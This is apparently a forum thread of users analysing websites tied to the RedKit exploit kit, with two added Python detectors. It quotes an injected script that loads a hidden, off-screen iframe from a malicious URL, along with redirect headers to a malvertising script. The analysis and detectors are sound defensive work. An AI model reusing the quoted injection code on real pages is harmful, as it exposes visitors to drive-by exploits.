Is this a Redkit exploit site? & avast detects a PUP here...

See: http://urlquery.net/report.php?id=94878
Detected possible RedKit exploit kit HTTP GET request
IDS alert for FILEMAGIC Macromedia Flash data (compressed),
This found suspicious: s.click.taobao dot com/9?p=31919830_0_0&u=index&l=htXp:/www.tmall.com/ benign
[nothing detected] (iframe) s.click.taobao dot com/9?p=31919830_0_0&u=index&l=htXp:/www.tmall.com/
status: (referer=static.xyincom.netdna-cdn dot com/)saved 2267 bytes 7f8979709884d846a95f7325445730a8f91e79d1
info: [img] img.tongji.linezing dot com/1023331/tongji.gif
info: [decodingLevel=0] found JavaScript
suspicious
PUP detected by avast: https://www.virustotal.com/file/9b7b84be9c515601d0daf1f924dde3141ae0a2849a315d0592ea48cee9a4b91e/analysis/

reported to virus AT avast dot com

polonus

Hi Polonus,

I researched the taobao site with my own hands here:
http://pastebin.com/d0TCytwK

~!Donovan

Interesting !Donovan,

adclicking trackware… also consider this:
[nothing detected] (script) a.tbcdn dot cn/p/p4p/hot-item-min.js?t=20110307
status: (referer=s.click.taobao dot com/)saved 1699 bytes d883749c14ae7ad48bec403b4f57474ced962bf9
info: [img] a.tbcdn dot cn/p/p4p/
info: [decodingLevel=0] found JavaScript
error: undefined variable TB
error: undefined function TB.namespace
suspicious:

a.alimama dot cn/i.js benign
[nothing detected] (script) a.alimama dot cn/i.js
status: (referer=a.alimama dot cn/inf.js)saved 14906 bytes 0b781b9ca29798ada82922f17906c4cb53f02a05
info: [script] a.alimama dot cn/
info: [decodingLevel=0] found JavaScript
suspicious: Trojan.Win32.Iyeclore - Detected URL is associated with malware in swf file,
see: http://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Agent-STI/detailed-analysis.aspx

polonus

Redkit exploit sites can be detected as goog-malware-shavar: http://www.cknow.com/cms/articles/what-is-goog-malware-shavar.html (article written by DaBoss)
and the site is then blacklisted - example: http://urlquery.net/report.php?id=97496
Web application details:
Plesk version 7 outdated: Upgrade required.
Running Plesk 7: resistenza dot it:8443 See: http://sitecheck.sucuri.net/results/resistenza.it/37263467.html
But trying to load htxp://www.google.nl/search?hl=nl&output=search&sclient=psy-ab&q=http%3A%2F%2Fresistenza.it%2F37263467.html&btnK=
avast Webshield alerts for JS:ScriptPE-inf[Trj]
Had I gone there, there would have been a conditional redirect: Header returned by request for: htxp://resistenza.it/37263467.html

HTTP/1.1 301 Moved Permanently
Date: Fri, 20 Jul 2012 14:24:07 GMT
Server: Apache
Location: htxp://bronzesage.ru/in.cgi?16 → http://urlquery.net/report.php?id=97788 Detected SutraTDS HTTP GET request
ET CURRENT_EVENTS MALVERTISING Malicious Advertizing URL in.cgi

The location line in the header above has redirected the request to: htxp://bronzesage.ru/in.cgi?16
see: http://www.google.com/safebrowsing/diagnostic?site=http%3A//bronzesage.ru/in.cgi%3F16

polonus
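A way to check a captured response for the kind of conditional redirect described above, as an added example (this is not code from the thread, nor from urlquery or Sucuri): it parses the raw header block, decides whether the Location leaves the site that was requested, and flags the in.cgi path that the quoted ET signature keys on. The response text is constructed to mirror the headers in the post, with the hostnames named there; the redirect is never followed, and the two-label host comparison is an assumption (no public-suffix list).

```python
"""Classify a captured HTTP redirect response (added example, not from the thread).

The raw response below is constructed to mirror the 301 shown in the post;
the hosts are the ones named there, written with a normal scheme.
"""
from urllib.parse import urlsplit

# Constructed sample modelled on the header block quoted in the thread.
SAMPLE_RESPONSE = (
    "HTTP/1.1 301 Moved Permanently\r\n"
    "Date: Fri, 20 Jul 2012 14:24:07 GMT\r\n"
    "Server: Apache\r\n"
    "Location: http://bronzesage.ru/in.cgi?16\r\n"
    "\r\n"
)

# Path marker the ET signature quoted in the thread keys on ("in.cgi");
# the CGI name alone is the indicator, the numeric query varies.
TDS_PATH_MARKERS = ("in.cgi",)


def parse_response_head(raw):
    """Return (status_code, headers_dict) from the head of a raw HTTP response."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    parts = lines[0].split(" ", 2)
    if len(parts) < 2 or not parts[0].startswith("HTTP/"):
        raise ValueError("not an HTTP status line: %r" % lines[0])
    status = int(parts[1])
    headers = {}
    for line in lines[1:]:
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers[name.strip().lower()] = value.strip()
    return status, headers


def registrable_host(netloc):
    """Crude 'site' key: last two labels of the host (assumption: no public-suffix list)."""
    host = netloc.split("@")[-1].split(":")[0].lower()
    return ".".join(host.split(".")[-2:])


def assess_redirect(requested_url, raw_response):
    """Describe a redirect relative to the URL that was requested.

    Returns a dict with the target, whether it leaves the original site, and
    whether the target path carries a TDS-style marker. Nothing is fetched.
    """
    status, headers = parse_response_head(raw_response)
    result = {"status": status, "is_redirect": 300 <= status < 400,
              "location": None, "cross_site": False, "tds_marker": False}
    if not result["is_redirect"] or "location" not in headers:
        return result
    target = headers["location"]
    result["location"] = target
    src = urlsplit(requested_url)
    dst = urlsplit(target)
    if dst.netloc:  # relative Location stays on the same site
        result["cross_site"] = registrable_host(src.netloc) != registrable_host(dst.netloc)
    result["tds_marker"] = any(m in dst.path.lower() for m in TDS_PATH_MARKERS)
    return result


if __name__ == "__main__":
    print(assess_redirect("http://resistenza.it/37263467.html", SAMPLE_RESPONSE))
```

Capturing the head of the response like this needs a client that does not follow redirects on its own (curl without -L, or urllib with redirect handling disabled); the example works on the saved text, so it runs offline and nothing in it contacts either host.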

What's on this site? A redkit exploit site with 65 IDS alerts?
http://urlquery.net/report.php?id=98250
see: http://labs.sucuri.net/?details=www.senkconsultancy.nl
URL blacklisted by Google Safe Browsing: goog-malware-shavar
http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http%3A%2F%2Fwww.senkconsultancy.nl%2F&client=googlechrome&hl=nl
7 trojans
continuous pattern in code: //eval j%3 //eval j%3 //eval j%3 CreateElement iframe
Just 1 detection here: http://vscan.urlvoid.com/analysis/3558e1cfa39e1d3cadeef6d4534471fc/aW5kZXg=/ (Ikarus → Trojan.Script)

polonus

Hi Polonus,

See: http://urlquery.net/report.php?id=98319
And: http://urlquery.net/report.php?id=98324

Trying to access it directly we get a 404. I'm assuming this is related to the evals. There could be some server-side action behind the scenes.

Also: hXtp://blog.spiderlabs.com/2012/05/a-wild-exploit-kit-appears.html

Hi !Donovan,

And browser-specific code. This comes after the </html> tag and can be considered suspicious:
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->
<!-- a padding to disable MSIE and Chrome friendly error page -->

polonus

VirusTotal
https://www.virustotal.com/file/051df1d6cfe3bca835db59e444a70b5868241f98b93aa57d95ba35fb2b3cf03a/analysis/1342818410/

First seen by VirusTotal
2012-07-20 21:06:50 UTC ( 3 minutes ago )

Yes, Pondus,

999em is being used for some text hiding or off-screen positioning, like in:

function frmAdd() {
    var ifrm = document.createElement('iframe');
    ifrm.style.position = 'absolute';
    ifrm.style.top = '-999em';
    ifrm.style.left = '-999em';
    ifrm.src = "htxp://figuurverhuur.nl/main.php";
    ifrm.id = 'frmId';
    document.body.appendChild(ifrm);
};
window.onload = frmAdd;

iframe source → http://urlquery.net/report.php?id=98319 (Detected possible RedKit exploit kit HTTP GET request)

!Donovan might give us additional info on how this is working and why they (ab)use -999em here,

polonus

sucuri
http://sitecheck.sucuri.net/results/figuurverhuur.nl

Hi Polonus & Pondus,

See: http://www.w3schools.com/cssref/css_units.asp
And: http://www.w3schools.com/Css/css_positioning.asp

Using -XXem on the CSS positioning properties is used to hide the text from the iframe on the current page regardless of the font size, due to its em measurement.

So -999em for top and left would completely hide the results in an unseen corner.
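A checker for the two tell-tales discussed in this thread, as an added example (not code from the thread, from urlquery, or from Sucuri): it looks in saved page source for a script that creates an iframe and pushes it off-screen with a large negative em offset (the -999em trick explained above), for an eval() call, and for markup trailing the closing </html> tag, such as the repeated "padding" comments shown earlier. The page samples in the block are constructed; the iframe URL in them is a placeholder, and the 100em threshold is an assumption.

```python
"""Flag injection tell-tales from the thread in saved page source
(added example, not code from the thread or from any scanner named in it).

1. Script that creates an iframe and positions it far off-screen with a
   large negative em offset (the -999em trick), or calls eval().
2. Markup after the closing </html> tag, such as the repeated
   "padding to disable MSIE and Chrome friendly error page" comments.
Page samples are constructed; the iframe URL is a placeholder.
"""
import re

# Assumption: no legitimate layout offsets an element by this many em.
NEG_EM_THRESHOLD = 100

IFRAME_CREATE_RE = re.compile(r"createElement\(\s*['\"]iframe['\"]\s*\)", re.I)
# Matches both "style.top = '-999em'" and inline CSS "top:-999em".
NEG_EM_RE = re.compile(r"(?:top|left)\s*[:=]\s*['\"]?-(\d+)\s*em\b", re.I)
EVAL_RE = re.compile(r"\beval\s*\(", re.I)


def find_offscreen_iframe(source):
    """Return the largest negative em offset applied after an iframe creation, or 0."""
    worst = 0
    for m in IFRAME_CREATE_RE.finditer(source):
        window = source[m.end(): m.end() + 600]  # script following the createElement call
        for em in NEG_EM_RE.findall(window):
            worst = max(worst, int(em))
    return worst


def trailing_markup_after_html(source):
    """Return the non-blank lines that appear after the closing </html> tag."""
    idx = source.lower().rfind("</html>")
    if idx < 0:
        return []
    tail = source[idx + len("</html>"):]
    return [ln.strip() for ln in tail.splitlines() if ln.strip()]


def scan_page(source):
    """Combine the checks into a list of finding strings (empty means nothing flagged)."""
    findings = []
    em = find_offscreen_iframe(source)
    if em >= NEG_EM_THRESHOLD:
        findings.append("offscreen-iframe:-%dem" % em)
    elif em:
        findings.append("positioned-iframe:-%dem" % em)
    tail = trailing_markup_after_html(source)
    if tail:
        findings.append("markup-after-html:%d lines" % len(tail))
    if EVAL_RE.search(source):
        findings.append("eval-call")
    return findings


# Constructed sample modelled on the injected script quoted in the thread;
# the src host is a placeholder, not a real site.
INJECTED_PAGE = """<html><body>
<p>Welcome</p>
<script>
function frmAdd() {
    var ifrm = document.createElement('iframe');
    ifrm.style.position = 'absolute';
    ifrm.style.top = '-999em';
    ifrm.style.left = '-999em';
    ifrm.src = "http://example.invalid/main.php";
    ifrm.id = 'frmId';
    document.body.appendChild(ifrm);
};
window.onload = frmAdd;
eval(p);
</script>
</body></html>
""" + "<!-- a padding to disable MSIE and Chrome friendly error page -->\n" * 6

# Constructed clean page: a visible, statically placed iframe and nothing after </html>.
CLEAN_PAGE = """<html><body>
<iframe src="http://example.invalid/widget" style="position:absolute;top:10px"></iframe>
</body></html>
"""

if __name__ == "__main__":
    print("injected:", scan_page(INJECTED_PAGE))
    print("clean:   ", scan_page(CLEAN_PAGE))
```

The off-screen check is tied to the createElement call because the static `<iframe>` tags a CMS legitimately emits are better judged by their src host; a small negative offset is reported separately since sprite and menu tricks use those without any malice.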